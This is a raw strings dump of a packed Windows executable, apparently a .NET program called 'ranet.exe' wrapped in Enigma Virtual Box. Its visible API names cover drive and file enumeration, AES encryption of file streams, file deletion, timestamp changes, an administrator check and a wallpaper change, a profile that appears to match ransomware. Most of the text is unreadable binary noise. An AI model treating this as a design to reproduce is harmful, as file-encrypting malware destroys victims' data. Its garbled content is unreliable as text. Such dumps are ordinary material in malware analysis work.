!This program cannot be run in DOS mode.
`_RMAMO
@.reloc
B.enigma1
.enigma2
v4.0.30319
#Strings
#Strings
#Schema
;Bqk~G
v5z]uv
0P0Pfs
D]L9BQ
~cdrh3
rvzVZn]
(/P7o!
k-nC2YvA)
&rNy6
T_1*U$3\2
`]szJVZ
p0P0HRm
Y6q@S,
NKPi`U
tt,4li
/tNiBm
ZJkI~zVZnI4$E
6zVBI1
'xP0P(W
Wxsxko}
@g|@)P
3"*)Bl
HOH0P0H
u3e^>&2^
;@q<b{
%Uc5s%
&0;)P7
HuZ9+j
Vv:VG\d|d
uv6zVB
2^*Olz,
zDSX6I
r%M~m\DY
,.p&dGD
Q7qHp0
0[mh,*
zq:]fg
[]SnSq|
 X?P,_
GjkYdO
3&q:+<
1Wa:nO[}k
W,A-nb
t;UTSL
8+2JkLxh
n|o(o
yV&t[/
c>%J)@
OZ9&eV
%t{`t_
&cK-;%
Mwu3e^PJ
EN8S(u~_Wp
~el~_?Z
v6zVZ-
 {/1Wa
@@]aw!
w:)0!L
HCekf`g
O)`3</Exkc~_
q9dO8?
;i~#6i
1Wa:z&
#k*QMN
LPP0P(
m& fmlJ
P0P(Fy
xCX'lG
*5z]u/Y
$729)
g CXNB
m47sjO
Pg|'; \Yb
,W >uR#
Q<3^S?
ILewu3
&ucBQv5
SxKV5U
VZvGFcD
vXxH@n
Bl%6+NW
wyO)b
BsgdA!
<f|t,4
qO*-B2z}
6zVZv:
gF#`o_
EKQ\7,
Gjk|GD
_12mH4
%]SE#hA
([[r!B
-NT72;$
(0P0-{
[f]LgbP
u]+-;$
nI`Nx#
Mf[Ne~e:
/drS4YA
GZZrgH
,z6IDY
zyw1*x;
u3e^5)
sv%n}Z
/Dy`za
FU@'F~
u>`_^N
jR;N`{}
7dr5nSV
Fg\/a!
?1xO0W
*eGjk-
&G#>%t[
aJY(:C
bW([[r
`ak:99d
r*]>v5
k4skL=
nzVZv"
Z}5?.xu
2#dm_v
9d.6zVB$
ranet.exe
2BC3F2D0
.cctor
<Module>
mscorlib
Object
System
B990D8C5
C9F280A8
51263044
3C8A4178
FB28E8E7
4921230D
43AB49CF
Random
2253BC8F
15BBAED3
3AFDDC50
7EF2230B
D2182C4E
ED31372A
78602204
914EF049
B7C192A4
57B016AC
SystemParametersInfo
user32.dll
8F7D88BD
1F727B47
value__
Centered
Stretched
78BF215A
80E2EC0E
BFFC3CD7
75EB3DAF
83427877
077619A7
30245264
AB3D8EC8
46106ED3
AB08FF10
C23A0BA3
82EC4FEF
A40C3CD8
4903EFF7
DateTime
BBDD7B5E
TimeSpan
E6884E84
5722E912
B43D6DAC
92300F58
269D94DA
D33E2262
FreeConsole
kernel32.dll
54228802
92AC82E3
A5CFA033
2656CD59
8F6D7B5F
9D08A83D
9932A7AF
5700C66D
DirectoryInfo
System.IO
634A8305
B070BE57
9D7E6BDD
0D8DD62F
FileInfo
14F18C2B
E92A285B
34FD9C70
D0D1FF11
0959D305
Default
698DAA62
95AF5947
FF71A609
DEC1B788
91E3DEBC
0173CC24
6F2F8DB1
C996BECE
09072DBE
137C13B6
A38F8057
B8E2C75B
AABD21C5
50D57A94
86998281
00BEE9F1
ECFBA02D
015AB4B9
DAF2D773
6620BACD
0F07A379
FE673EF7
List`1
System.Collections.Generic
2E1F9D36
BE16A89D
E904D44F
SafeFileHandle
Microsoft.Win32.SafeHandles
DeviceIoControl
39DF438B
DA57F0FE
F4804218
A0056BB7
9AF28EE1
StringBuilder
System.Text
WNetGetConnection
mpr.dll
AF202992
CreateFileW
213FF66B
81AF3046
309BDF56
ValueType
EA48EA8E
E804E976
D7A6993E
DF06F34B
3AD4E7CC
7CF2273B
8425A00E
9681BC43
CD6DC46B
64CCA697
A4EE12B9
E70879B6
DB466326
247E0419
781DA339
5BF4D1D0
4E1BB4CA
5E79F284
D976E0A8
112328F5
11BCA45D
28541B6F
BFB3C1D1
7619F20E
DF1A9251
1129440E
19569C4D
5C7DD780
918ED991
08F218CA
2CB9E6E6
095A7180
WNetGetUniversalName
BD2BBD6B
D132F051
UniversalName
RemoteName
DF61AA7C
B8673A93
EB1D29AB
94397600
5C68686F
A261671A
547665FC
E110A8DE
07D1BE21
DriveType
F36DBC1D
B67734E3
83D9152C
4A57EAF1
53F239D9
70728EE9
2E3B93A3
1598E6DF
65D79D93
0CE2C823
0E1F7830
5BBE1F6E
45E8B23A
0D375FD7
C9077E02
1A987B69
32239DD4
2EFB5E98
A2751D38
C069CD47
EEE303A7
896A2B87
CDDBB911
DD016084
91CD4C89
A31BCADE
46C5481F
721DFE80
4DB17C36
6FB74B6E
35F4E26A
25B5181B
3D3F6100
6618F168
2E033973
476FDD8B
3A5BA27E
321CEC36
909C8213
440CD410
849206B0
1AE798AC
0CBA7862
7867A499
CF783B17
BDB9C506
Unknown
2B760A34
SeekPenalty
RotationRate
97DCAE59
Exception
System.Core
ExtensionAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DebuggableAttribute
System.Diagnostics
DebuggingModes
AssemblyTitleAttribute
System.Reflection
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
GuidAttribute
AssemblyFileVersionAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
CompilerGeneratedAttribute
DebuggerBrowsableAttribute
DebuggerBrowsableState
System.CodeDom
7B5232BA
B1E71C0F
RuntimeTypeHandle
String
Double
Boolean
Single
GetTypeFromHandle
DriveInfo
GetDrives
GetValue
get_DriveType
get_Name
get_Length
Enumerable
System.Linq
Repeat
IEnumerable`1
Func`2
Select
ToArray
get_Chars
Environment
GetEnvironmentVariable
SetValue
Directory
GetDirectories
FileSystemInfo
get_Attributes
FileAttributes
Concat
GetFiles
SearchOption
UnicodeEncoding
Encoding
GetBytes
FileStream
FileMode
RijndaelManaged
System.Security.Cryptography
SymmetricAlgorithm
CreateEncryptor
ICryptoTransform
CryptoStream
Stream
CryptoStreamMode
WriteByte
ReadByte
Exists
Delete
Registry
Microsoft.Win32
CurrentUser
RegistryKey
GetCurrentDirectory
OpenSubKey
ToString
get_TickCount
NextDouble
ArgumentException
Convert
ToInt16
ToInt64
ToSingle
op_LessThanOrEqual
get_Ticks
ToDouble
GetValues
ThreadStart
System.Threading
Thread
get_Now
Append
GetFolderPath
SpecialFolder
Create
StreamWriter
TextWriter
IDisposable
Dispose
get_Exists
GetFileSystemInfos
InvalidOperationException
get_FullName
GetPathRoot
Equals
StringComparison
IsNullOrEmpty
ArgumentNullException
DirectoryNotFoundException
get_IsReadOnly
set_IsReadOnly
FileNotFoundException
GetParent
get_Root
Substring
DateTimeKind
set_LastAccessTime
set_LastWriteTime
set_CreationTime
MoveTo
set_Attributes
get_Message
UnauthorizedAccessException
get_Parent
GetRandomFileName
Combine
GetDirectoryName
FileAccess
FileShare
SetLength
WindowsIdentity
System.Security.Principal
GetCurrent
WindowsPrincipal
IsInRole
WindowsBuiltInRole
get_IsReady
get_DriveFormat
get_VolumeLabel
get_AvailableFreeSpace
get_TotalSize
get_TotalFreeSpace
get_RootDirectory
ToCharArray
SecurityException
System.Security
IntPtr
Format
SafeHandle
get_IsInvalid
Marshal
GetLastWin32Error
Win32Exception
System.ComponentModel
SizeOf
Address
OffsetOf
get_Capacity
GetFullPath
TrimEnd
WrapNonExceptionThrows
Copyright 
  2020
$7065691f-530e-44a7-ad79-ce8cff521d81
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
proggam
cGnOt
$LDP@ELo
Ncq_@s5
[cgt`up4
Eoq$73
G>+l evm
pea; F@)u
S((?j"
mrgE,Nl)|^
Bo(p[(
TjwhG|Jy
1^Jdw$
3`]9<}v
e;`]#wJ
r[]@@z
M5"L)R
Nj}i,
+IO>%q$
ou5`]Z
+jY(R6
m@6x=
{H?v_H
!>@'#9
P2SY^"
_|PDJG
h4Pp=F@
B|5;GL
~R"V:`
?:N>|p
vY=owqt-
:@<}wi
],zC'y
7kj8H-
QLIi?Z
Y#){tw
`QcX:
w{"t,\
Rz]Ns\`L
d>`X?37
PyU|Q<
{-LUHe
-lus^q0@
w?5ERl
sQ.]<VZ
PI,a|x:p
#\^z9+
E,RwF]
37<)'2
yaB{@W\L
aI;H27
ePXm3Z
+a6[WM
S*GO88
>.b\z|
.<CqPHo
&L}: 6
6cs+\ 
X$(@R0
g!l9H<
`K9d8we0
2Ca97(
9p6RoL
CmhV{^=
kxVRlI
.&mP~|
ey>89r
daX.u0
]lkdnMi
R$w[SPB
!:y$`
/q@O63@iS{9MT
[2u9zk
)@>s1zG
~9B1o,
`.D?ML
'.5aw7
_wc=OX
wL;Q]c
x_R`-
6nzewR
)68wRV
&Ko!G=
Rveo1.
=C},?O
a0vJ@a
u;hb}:
(/7=<D
L&r)=S
+5"WwA
-pTuwd
\YVFI5.
G[U<QR
3&^qD>
=vLCO=l
~RJ0mx
=7,]K
HmK0"i
n%)-q:
S+ *`n4
KqC@yj
d#,`wl
n:D.lz]
bqO,mF@4
 vhNLR
fkoZ&m
Jum&;k
<FBkLcy
%r'M?6
;-\HP>
07~b0}
we:GU&
-)b#G6
a%<AIK
kyP-St
q#gu0=
 l!O2w
A"XNyH
z>WTI0
 1!_50
nso4N0CO
oW};q&
J`KT>k
-C|(M$N
Q`p.J
rA<83{
[{Izu#
Gba>-o
tTKb^'
ud=6b>
z0n+7T
o6XC?\
,F[s>
u1.*gH
1FAT]I
xV99U
d]B^tQ
-?x"|^
y%aA`>.h
5D{pa<
J<(_@
<h$\bm
HjOU=Y
5Y*pk0
}i\r2
9WAFZT
Q]Oo6_d
(LhE4xd
hl[.q
06",?R?
73*T;Lh
{Sa 96
"'o@+Aj 
8.9$7P
xzO9_F
Zh|aRPp
[B|s$"
NbflFA3
2on>(M;D
^Bj&AP
>E1u4,D
,&PZ#tF
Br4eoX$
l#6LE
yw|l%
Gp<${W
+L`0<@
O5QE>s
\Xi=^]
~-0Gx&
ox682`t
wq$G.Se
OlKSVyh
1KJaQN
~PLo7z
om)H[s
v)7xH;
~Bm\?`
y*R(bxeH
mscore
Q,42f&'
8dO,&/
ab~S1c8
gRwozt
z.O`#"
!g_ <{x
.ZzN=?
.TiS6s
DQbwZ1
B#$X3`
i"J8CX
qtl[<9
oYscpD
cYr`UX
f'^z`!AC4 
y45\kZ6
@s:*)F/{
H)Qj@<%
KG+F5Zz
`b,@Z~
r(n|/&
OkK~8 
9<A7D}
=GK?m|0
/d^ow<
RH @a
" OM\U`z
DM(uv:
E59?BW
cw}@|e
{7XFl#
S@*2q{
]Z~l,6
gR(V^v
(UOb`0
)TNUD}
$)p/?}
'\=xq>kZ
^;kS<W
@ oWuA
e/Ni,> ?
Re43HS%
d7VG`!
N6=\{
#O2R[1J
]^jDx\E
e@71p`^
tsVn~.
" .;=e
bN:u-W
2a!vD4<
3(9w,'
&'f?:/
~hB.$*V)
wo41&m
~PT?!z
^"}O\P
HGBN69
HI)2WPF
aY02`
KV<S@?
Sf"uc1
3mvtdb
`zf1#3
?zJZSP
-:}=~{
%\E2a!qD
g8.QzD
Q|v%;Ec
<sfE%*
]D< $f
=S LNY
eM.0|
(w+}@\
Y\e~HB
-{e}5
P#s`1('
=2&7@
k2B({/
RBHl^*
e+"f=yD
41%aw_
p@JvLf;
<K>f@:
Jr~:g6
7|z&wA
X&Yx:1
XP(hfo
hN@ke-
^ $Z]1
9J\=C}
~vA[/2
{_(xVAHK^
73g=V}
]dWqKG
'+pD9.
lC$X*M
`O-w?V8
[1H>s!
~>|$/+
Po-< *
hlMJ.W
rk!w
dsoZ|G
~M[4pU
6>zK@
MW/O{q
R\wq^>
,*X{FL
eYZ3*w+
&D@%nl
cU9_@A
&>6'7<
CrL}E6
Om{L `
9J,5 6
-=O*X4
xbdkBN
d|+ w:
~2OV@T
)mFL5$R
H+FyV\
IF}fvc
jE}n[
FC=zV=S%
" A9q~
FnEdXOm
PoD:.;e
>/f.DP
Qj1LW
X8Lzgu
lfXqY
a&pI#=
HCm8[a
*gS9d}6
n]x7zJ
ro<cYLn
a/-{h~k
jvg>x#
p/;",t
U[{5a$)
w/LGbU
r/s&c<
YsR2Ne
3x87V%8
'u%E\6
rMAF<C
P*B^4/
'PHDE:
C&c0^=
H{XuuB
09yL81i
00[xFb4
I9Pk4>
OZ9@,Fs
$5FP}~
#6.3zE
!yw0ZQ
6i{.?3
G8ziH/t
bO=d\z
;Ot@
DkU"d>
8Px=d
$%Z?sr
>@`Acn
0P8hT;
Wm9z& 
B0'Fx,
u3n`F4
u~Pi;T
1Y'? 
6riyP<
<\tSrZ
!eOx[@
nNU0r
jsXQgO
yI{)9O
_P"wM*
Oi)yo"
H[b0\J
"6{K-sN
NaGd.z
@pr)9NB
D\sk7Jn
,kir\9s
K-`tp+e
cl:(L
sn6_#3
."')k@q
XGd='x-Z
Xnk:c ]
E.N>RI
QZOBTUb
&yb@)
_CorDl
;Dt~ >U
:#bsu~
o^1!U@ ,
##\@ JE
+|s}08
jcvT_
8_ivPZlM
!"+ZNk:
V-0{;L9
/au4^$|
PBBOx
G<+A2`
+X(L^1
rJoZlC
D|>X$B( 
S|AtlC
#5-kZi
AU,Iiw
QNk1m7<
S]#[\0
!Z4qt@
\Qd@'S
^ P-0JE
&0$t;=L
<g>4A!^
%?QNKh
+N@P>xv
`_%7zw;L
{~,?Sq
p@L?;VFZadkFJ+
S9!_`@
W,3r0p-M
LDahiT
G%P3l$
k/I|'B\Jx
kY?DD
FX`|8;
fip6;L
ZdQ^pz
"-5';.e
 6i3C[
^o~M]X
q>.Snd
H?)(-X
azB-wZyD
R?2/(X[Y+8D
-E@;RU}
6/X#Q#@
LiG~)X
aN])D_
J(K>,l
p,5h9OL
UJANA>
f!S/ t
mLZ2AV
0uK:(nj
fa9+D.@
B{XDy/o
Ye- W'
Di)dD\
osDB?C7 
LAp%G f
,Eyr*P}
0QYU);=
CAX;A@}*nS^c
5wq2;-
8QX#~"
g30$jS
FUTM(y7
02fN3:RH
_d":o*
X68&U!{
?F@=\7:H
&^*$1@
`jnGLL>
k(<}vL
30#gII
1@A8;W
QN<*m^ ;
t`^B]I
S:x@^sLC
1*v.zR
QqfnDsX
`a\%U3F
C^E20Mzd
Pl2$BY
6^C;9F
V1t$ U
+Hi4_jNz
RrLedR
*2;X@q8
ILH\D-
z #G<HB
CYa)1;H
GyN$YP
c5 =ZFX
kaa9(dy
tdo)`8
WO^(dX
 @x+NC4
1_3@+(Yr2
9vK.fv*
H9A"306
3{$@zOs@
:\}y$}SMF
E@z\%9
n>(@D-
8.P-T[
hd0s(]aS
|=IfY%_
e;[&UB
`*0#_R
M"A?+d
9x&^3
H>c*47yp$
WOa40CH
AKT_PQImz
1?v;kcO
g&H`XP
.;6W[3
0,t$G`
9!tMg
T2t!JW
sF9%Ci;@6
q6J1FX@
r&[XsN#
$7A3+}\s
:dQ`NI
bro>`T
/VHjB/H
4,* _YL
@}wBLY
~kIWv+!k
S,[;r,OS
0\~Z]ZD
Afd:!o
vi^2}[S
nL9oIM
H+-'+zO>
T4@:A[
xi04L}
8&2#`N
\gjiS.
#Qc;Nv
u`;)QD
_U!K4/\
*R06$NS
B@" CP
=1@zQ;
"oEYA.
f6W)W?
 ^R.=h|
 YI,_$Q
roXVH,
rK=YY`
i0jtJ$=.
RT?9XN
H12jH9/+0
4!+zHf
{:R_e|
T*1Xu*A
}h*<2$
 1hgvn0
<[V^;mm
>@,NA_
p)>8~p5
KELAvY@
lDwn,H4@
 raEM{
a/$O*}Z
'B2Ep,M
V-oh`D~
{jm4+g
)wX9nw
EIgb`(
@k)cT:
=fX9R1
h#[-JO
OA2Zv
 GylLk
Ry<)Cy
#5.*)1k
oPs%ohk
~uhw0
%@|4I_>
QPR0e$
m2rUbX4o
r-Y?!K3
Vl8In]
`I);vN#
Xpr*>}kg\
s3HzH(
`&\gJL
)lrZ4T
}&u,.7
)v0@3$
&Kv)B4
~wg'>e
%6c8l8
;`IP?d
j4"%@
G a5Yv
qDY:22
GE_ '/
sdWJCN
jma'9r
Zn4AhE
 egRS^l)
Aj*87 
P}-J\d
  9HoH%t
Msukl 
7'!%X'9
 hK@)&
Z(!G,z
\bk%u\x# DM8,
6=C[Z+
R4$(df
yP7*oK;
4vJ~Iz
PA9vw:-w
6>U3\G
N4$np`
4&)PZ4>
Ob+d!z
AJJ-GY{
RE]<^C
@odBHU
R0(fC j4(
D575N6S
_VX<=^
C O8Fql
^)}&rf
"dQDQ}0
>`XsU
ohX=T{#.
6{MK\l
WCdos4
*d?wX:
je&)V>
$EYFaa{
Strin(gs"18
;ABlobMpdk
Ydl2y*,
k"8Dl
g!{
bCV8S!T
q*8Z!n
>k"@lt
>=2!1F
$Hd*23
>o"RCx*
d#2,,l5
2:>>zA
#6C,#l
C^F*#gdp2
ClF*!u
?\"Q+8
s%w<p|
oH1?J(2
X&gN9M
~i~*~R!
n,r|A5
iKf?pz)
fd?{?$&
gb8O1p
~l~!B~
)l!FJlL
xu"&<Cl
GhR&+D*
CN*W6E`
B>"B*+
Cf*oBCx*
 "!D"$
)"*D+,
1"2D34
9":D;<
A"BDCD
I"JDKL
Q"RDST
Y"ZD[\
b"cDde
,(2$E,
<M>ag*X6T^
!vIz`t
Q;,PB1
T2LF8|
l&,|dd
;$;n3
|\gc1l
ha|pDmt
a:h;n<|=
9&$:7;M<i=
69+g:o;
\,~_:;
2rBtrv
t*v3x;zE
>b"%Ck"tp
poMnLHT8{-z
GSystem.
s!Ilda
m_(>R>n
rspxvnc`
f2>cXo@
TyVp@p
2}M(th
K6&d%>
,BuH(U
&LgJBR
qmM:D>
RUyC'&H
=S@gKG
=J%7P!
)|iM6&
S~NJi589_
4F7B65
608\F;A
8pLo2}t
3CA<75m%$
ym%"q\es
{$C2FD
A(-\FY
H2_Mddz2
IK1,we
D;k78-T6
T(diX-
8K(|'E
PadHw<aM/x
D7Ik)iT
-,>F_Z4
6KoZ:U
A_7_d}[
Zx|TA=
9`e4ID
~K7$l_
wY*I?o
XH]I6Q
\hlfK+
HPU+%>!
okvU-P
KAzHgF
5w(9P0A
}\i(R&
lrIXM^B
RM_:4%
F(wOR~
Irt^B[v
->:8i7
0jCW):|T
bNm`,(
w[eCm8
>MulhVNG
INSTAI)
SubKUCK
_$yQlGf)
P*'xYQa
!Mqnif
ourzcmNpc
kUInt64
luX!3p24Em
z`u(Hash
kIASfaB
4<aOSV
XFii$
^mDitc
%xOfIdSB
C%*1J%R
i)ws0v
Timfb
w1g4@D
Q/A%pi
fDL:Lm@
,c>fbpp-{!
M-P3)S_s
cyepU8
&sq]D1;
sm8{44
EFFjC5,
P|Kv)n
QOw13f%uD)
6;5dpSJI"
Y2dewfJ\N}
jL`.T@
YdB3p/Jt
zv4P7!
Vwjh#O
<%MC(L
3:X.r`0
.NET8-
DEBUIGj
ao=2"am
R\7Oa5
#TY+1]Op(
DTi;{\j4
-\@}_5
 ~$3$)_>
This program must be run under Win32
.idata
.edata
P.reloc
P.rsrc
%xOfIdSB
C%*1J%R
i)ws0v
Timfb
w1g4@D
Q/A%pi
fDL:Lm@
,c>fbpp-{!
M-P3)S_s
cyepU8
&sq]D1;
sm8{44
EFFjC5,
P|Kv)n
QOw13f%uD)
6;5dpSJI"
Y2dewfJ\N}
jL`.T@
YdB3p/Jt
zv4P7!
Cardinal
String(
WideString
TObject
TObject
System
IInterface
System
TInterfacedObject
YZ]_^[
YZ]_^[
_^[YY]
YZ]_^[
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
ZTUWVSPRTj
YZ]_^[
t@h42B
kernel32.dll
GetLongPathNameA
Software\Borland\Locales
Software\Borland\Delphi\Locales
_^[YY]
Exception
EHeapException
EOutOfMemory
EInOutError
EExternal
EExternalException
EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivide
EOverflow
EUnderflow
EInvalidPointer
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
EOSError
ESafecallException
TFormatSettings
SysUtils
SysUtils
TThreadLocalCounter
$TMultiReadExclusiveWriteSynchronizer
<*t"<0r=<9w9i
_^[YY]
INFNAN
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
_^[YY]
_^[YY]
$YZ_^[
t%HtIHtm
_^[YY]
$Z]_^[
QQQQQQSVW3
QQQQQSVW
_^[YY]
TErrorRec
TExceptRec
YZ]_^[
m/d/yy
mmmm d, yyyy
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
(Z]_^[
ISequentialStream
ActiveX
IStream
ActiveX
tagEXCEPINFO 
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
TCustomVariantType
TCustomVariantType0
Variants
EVariantInvalidOpError
EVariantTypeCastError
EVariantOverflowError
EVariantInvalidArgError
EVariantBadVarTypeError
EVariantBadIndexError
EVariantArrayLockedError
EVariantArrayCreateError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantUnexpectedErrorT
EVariantDispatchError
_^[YY]
QQQQSV
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
String
Array 
ByRef 
Variants
_^[YY]
t~hDXE
EOleError
EOleSysError
EOleException
Apartment
Neutral
ole32.dll
CoCreateInstanceEx
CoInitializeEx
CoAddRefServerProcess
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
QQQQQQQQSV
PQRh #E
_^[YY]
_^[YY]
_^[YY]
_^[YY]
_^[YY]
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:?
!"#$%&*;<=>@[]^_`{|}
EStreamError
EFileStreamError
EFCreateError
EFOpenError
EFilerError
EReadError
EWriteError
EListError
EStringListError
TThreadList
TPersistent
TPersistent
Classes
IStringsAdapter
Classes
TStrings
TStrings
Classes
TStringItem
TStringList
TStringList
Classes
TStream
THandleStream
TFileStream
TRegGroup
TRegGroups
Strings
S$_^[Y]
_^[YY]
SdZ]_^[
$Z]_^[
_^[YY]
ETntGeneralError
TWideFileName
TSearchRecWp
QQQQQS
TNtDllHook$
ZwClose
ZwSetInformationFile
ZwQueryInformationFile
ZwReadFile
ZwCreateFile
ZwOpenFile
ZwQueryAttributesFile
ZwCreateSection
ZwMapViewOfSection
ZwQuerySection
ZwUnmapViewOfSection
ZwQueryFullAttributesFile
ZwWriteFile
ZwQueryObject
ZwQueryDirectoryFile
ZwOpenSection
ZwDuplicateObject
ZwQueryVolumeInformationFile
ZwDeleteFile
ZwLockFile
ZwUnlockFile
ZwTerminateProcess
ZwOpenKey
ZwEnumerateValueKey
ZwQueryKey
ZwQueryValueKey
ZwCreateKey
ZwEnumerateKey
ZwSetValueKey
ZwDeleteKey
ZwDeleteValueKey
ZwFlushKey
ZwLoadKey
ZwLoadKey2
ZwNotifyChangeKey
ZwQueryMultipleValueKey
ZwReplaceKey
ZwRestoreKey
ZwSaveKey
ZwSetInformationKey
ZwUnloadKey
ZwAccessCheck
ZwExtendSection
ZwFlushBuffersFile
ZwFsControlFile
ZwNotifyChangeDirectoryFile
ZwQuerySecurityObject
ZwSetSecurityObject
ZwSetVolumeInformationFile
ZwOpenKeyEx
ZwCreateProcess
ZwCreateProcessEx
ZwCreateUserProcess
ZwResumeThread
ZwCreateThread
ZwQueryInformationProcess
ZwQueryVirtualMemory
ZwDeviceIoControlFile
ZwUnmapViewOfSectionEx
ZwQueryDirectoryFileEx
kernel32.dll
IsWow64Process
kernel32.dll
GetNativeSystemInfo
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
SWVQRP
ntdll.dll
ZwProtectVirtualMemory
ntdll.dll
ZwClose
ntdll.dll
ZwQueryInformationFile
ntdll.dll
ZwSetInformationFile
ntdll.dll
ZwWriteFile
ntdll.dll
ZwCreateFile
_^[YY]
ntdll.dll
kernel32.dll
GetProcAddress
WideStringHashUnit
TWideStringHash
TVirtualBoxDriveItem
TVirtualBoxRegistryRootItem
TVirtualBoxChildProcessX
virtualboxunit
CPEImage
virtualboxunit
virtualboxunit
virtualboxunit
CVirtualBox
_^[YY]
_^[YY]
_^[YY]
ZwQuerySection, Unsupported class %d
ntdll.dll
InitializeSelf
_^[YY]
_^[YY]
KeySetValue unsupported value type 
WARNING: ZwQueryValueKey, unsupported class %d
WARNING: ZwQueryKey, unsupported class %d
_^[YY]
ZwQueryObject with unsupported class 
WARNING ReadTreeInformation with unsupported class 
WARNING ZwQueryDirectoryFile with unsupported class 
_^[YY]
ZwSetInformationFile with unsupported class 
_^[YY]
_^[YY]
QQQQSVW
tFh<>D
DllRegisterServer
DllInstall
Software
_^[YY]
_^[YY]
GetErrorMode
kernel32.dll
TSxsGenerateContext_XP|
TSxsGenerateContext_Vista
TSxsGenerateContext_Seven
RtlCreateActivationContext
ntdll.dll
sxs.dll
SxsGenerateActivationContext
_^[YY]
kernel32.dll
CreateActCtxW
TStringPart
CFileDescription
virtualboxglobalsunit
CVirtualBoxGlobals
TVirtualPackageX
TMapTemporaryFile
TVirtualBoxAsZwMap 
CHandlesList
TVirtualBoxRegistryItemH
CVirtualBoxTreeItem
_^[YY]
P$YZ_^
P,YZ_^
P4YZ_^
P<YZ_^
E#+E/^ZY
THookWindowsAPI
ZwClose
ZwCreateFile
ZwOpenFile
ZwCreateSection
ZwMapViewOfSection
ZwUnmapViewOfSection
ZwUnmapViewOfSectionEx
ZwReadFile
ZwQueryInformationFile
ZwSetInformationFile
ZwQueryAttributesFile
ZwQuerySection
ZwQueryFullAttributesFile
ZwWriteFile
ZwDeviceIoControlFile
ZwQueryObject
ZwQueryDirectoryFile
ZwQueryDirectoryFileEx
ZwOpenSection
ZwDuplicateObject
ZwDeleteFile
ZwLockFile
ZwUnlockFile
ZwTerminateProcess
ZwQueryVolumeInformationFile
ZwSetVolumeInformationFile
ZwAccessCheck
ZwExtendSection
ZwFlushBuffersFile
ZwFsControlFile
ZwNotifyChangeDirectoryFile
ZwQuerySecurityObject
ZwSetSecurityObject
ZwCreateProcess
ZwCreateProcessEx
ZwCreateUserProcess
ZwResumeThread
ZwCreateThread
ZwQueryInformationProcess
ZwOpenKey
ZwOpenKeyEx
ZwEnumerateValueKey
ZwQueryKey
ZwQueryValueKey
ZwCreateKey
ZwEnumerateKey
ZwSetValueKey
ZwDeleteKey
ZwDeleteValueKey
ZwFlushKey
ZwLoadKey
ZwLoadKey2
ZwNotifyChangeKey
ZwQueryMultipleValueKey
ZwReplaceKey
ZwRestoreKey
ZwSaveKey
ZwSetInformationKey
ZwUnloadKey
_^[YY]
ntdll.dll
kernel32.dll
GetProcAddress
CDotNet
QQQQQQQSVW
_^[YY]
_^[YY]
_^[YY]
_^[YY]
_^[YY]
_^[YY]
_^[YY]
_^[YY]
_^[YY]
_^[YY]
_^[YY]
CGlobalPaths
Cannot load library 
Cannot find function %s in library %s
Cannot find function ordinal %d in library %s
Memory Protection failed...
ntdll.dll
RtlGetCurrentPeb
EVB_%.16x_%.8x
ntdll.dll
Runtime error     at 00000000
0123456789ABCDEF
Qkkbal
This program must be run under Win32
ntdll.dll
ZwOpenFile
This program must be run under Win32
.section
ntdll.dll
ZwOpenFile
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
ExitThread
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
LoadStringA
